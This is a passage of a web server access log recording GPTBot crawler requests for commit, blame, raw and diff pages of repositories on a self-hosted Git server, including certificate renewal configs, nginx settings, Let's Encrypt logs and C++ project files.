(KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/letsencrypt/renewal/npm-4.conf" -[17/Feb/2026:13:24:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/letsencrypt/renewal/npm-6.conf" [Client 74.7.227.38] [Length 695] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/letsencrypt/renewal/npm-6.conf" -[17/Feb/2026:13:24:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/letsencrypt/renewal/npm-2.conf" [Client 74.7.227.38] [Length 697] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/letsencrypt/renewal/npm-2.conf" -[17/Feb/2026:13:24:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/actions" [Client 74.7.227.38] [Length 7414] [Gzip 2.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/forks" -[17/Feb/2026:13:24:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/actions" [Client 74.7.227.38] [Length 7411] [Gzip 2.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/stars" -[17/Feb/2026:13:24:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/.gitignore" [Client 74.7.227.38] [Length 9875] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/.gitignore" -[17/Feb/2026:13:24:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/Hero.tsx" [Client 74.7.227.38] [Length 13654] [Gzip 5.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/Hero.tsx" -[17/Feb/2026:13:24:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/Hero.tsx" [Client 74.7.227.38] [Length 3077] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/Hero.tsx" -[17/Feb/2026:13:24:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/README.md" [Client 74.7.227.38] [Length 9879] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/README.md" -[17/Feb/2026:13:24:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/fallback_error.log" [Client 74.7.227.38] [Length 9503] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/fallback_error.log" -[17/Feb/2026:13:24:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/fallback_error.log" [Client 74.7.227.38] [Length 10839] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/fallback_error.log" -[17/Feb/2026:13:24:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project" [Client 74.7.227.38] [Length 10895] [Gzip 4.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project" -[17/Feb/2026:13:24:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project" [Client 74.7.227.38] [Length 10924] [Gzip 4.32] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project" -[17/Feb/2026:13:24:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/Hero.tsx" [Client 74.7.227.38] [Length 13869] [Gzip 3.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components" -[17/Feb/2026:13:24:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/nginx" [Client 74.7.227.38] [Length 9835] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/nginx/proxy_host" -[17/Feb/2026:13:24:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/nginx" [Client 74.7.227.38] [Length 9867] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/nginx/proxy_host" -[17/Feb/2026:13:24:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e.patch" [Client 74.7.227.38] [Length 185638465] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e" -[17/Feb/2026:13:24:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2.diff" [Client 74.7.227.38] [Length 6160] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2" -[17/Feb/2026:13:24:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/main.cpp" [Client 74.7.227.38] [Length 11407] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject" -[17/Feb/2026:13:24:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/database.sqlite" [Client 74.7.227.38] [Length 10153] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/database.sqlite" -[17/Feb/2026:13:24:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/Hero.tsx" [Client 74.7.227.38] [Length 13879] [Gzip 3.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components" -[17/Feb/2026:13:24:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/cpp" [Client 74.7.227.38] [Length 10726] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm" -[17/Feb/2026:13:24:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/.vscode" [Client 74.7.227.38] [Length 10163] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject" -[17/Feb/2026:13:24:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/.vscode" [Client 74.7.227.38] [Length 10164] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject" -[17/Feb/2026:13:24:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/Hero.tsx" [Client 74.7.227.38] [Length 13650] [Gzip 5.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/Hero.tsx" -[17/Feb/2026:13:24:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/Hero.tsx" [Client 74.7.227.38] [Length 9874] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/Hero.tsx" -[17/Feb/2026:13:24:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/Hero.tsx" [Client 74.7.227.38] [Length 3077] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/Hero.tsx" -[17/Feb/2026:13:24:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/.vscode" [Client 74.7.227.38] [Length 10164] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject" -[17/Feb/2026:13:24:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc?display=rendered" [Client 74.7.227.38] [Length 10999] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" -[17/Feb/2026:13:24:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/main.cpp" [Client 74.7.227.38] [Length 172] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/main.cpp" -[17/Feb/2026:13:24:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" [Client 74.7.227.38] [Length 10277] [Gzip 2.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83" -[17/Feb/2026:13:25:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/Hero.tsx" [Client 74.7.227.38] [Length 13655] [Gzip 5.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/Hero.tsx" -[17/Feb/2026:13:25:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/Hero.tsx" [Client 74.7.227.38] [Length 9877] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/Hero.tsx" -[17/Feb/2026:13:25:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/Hero.tsx" [Client 74.7.227.38] [Length 3077] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/Hero.tsx" -[17/Feb/2026:13:25:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" [Client 74.7.227.38] [Length 10108] [Gzip 2.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8" -[17/Feb/2026:13:25:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.3" [Client 74.7.227.38] [Length 9915] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.3" -[17/Feb/2026:13:25:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.7" [Client 74.7.227.38] [Length 9943] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.7" -[17/Feb/2026:13:25:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.2" [Client 74.7.227.38] [Length 9942] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.2" -[17/Feb/2026:13:25:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.6" [Client 74.7.227.38] [Length 9921] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.6" -[17/Feb/2026:13:25:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.7" [Client 74.7.227.38] [Length 9914] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.7" -[17/Feb/2026:13:25:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.1" [Client 74.7.227.38] [Length 9912] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.1" -[17/Feb/2026:13:25:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 71829] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" -[17/Feb/2026:13:25:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" [Client 74.7.227.38] [Length 15176] [Gzip 4.64] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" -[17/Feb/2026:13:25:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.5" [Client 74.7.227.38] [Length 9920] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.5" -[17/Feb/2026:13:25:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.6" [Client 74.7.227.38] [Length 9950] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.6" -[17/Feb/2026:13:25:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 71825] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" -[17/Feb/2026:13:25:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.4" [Client 74.7.227.38] [Length 9914] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.4" -[17/Feb/2026:13:25:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.3" [Client 74.7.227.38] [Length 9944] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.3" -[17/Feb/2026:13:25:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.2" [Client 74.7.227.38] [Length 9914] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.2" -[17/Feb/2026:13:25:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.4" [Client 74.7.227.38] [Length 9942] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.4" -[17/Feb/2026:13:25:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.5" [Client 74.7.227.38] [Length 9949] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.5" -[17/Feb/2026:13:25:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.1" [Client 74.7.227.38] [Length 9941] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.1" -[17/Feb/2026:13:25:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr 